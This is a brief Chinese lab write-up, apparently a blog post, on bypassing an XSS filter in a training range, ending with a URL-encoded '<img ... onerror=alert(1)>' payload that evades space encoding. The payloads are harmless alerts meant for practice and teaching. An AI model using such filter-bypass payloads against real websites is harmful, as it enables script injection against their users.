测试环境:东塔靶场
![](https://img-blog.csdnimg.cn/20210426140542423.png)
通过源代码查看,对script进行了一个实体编码。
分别使用:
javascrip
t:alert(1) {实体编码后还是对script进行了过滤}
οnclick=window.alert(1) {没有进行过滤但是不会弹窗}
使用<img src=x οnerrοr=alert(1)>
通过源码发现对,空格进行了实体编码。
![](https://img-blog.csdnimg.cn/20210426140542428.png)
尝试使用url编码进行绕过
<img%0Dsrc=x%0Dοnerrοr=alert(1)>
成功实现绕过。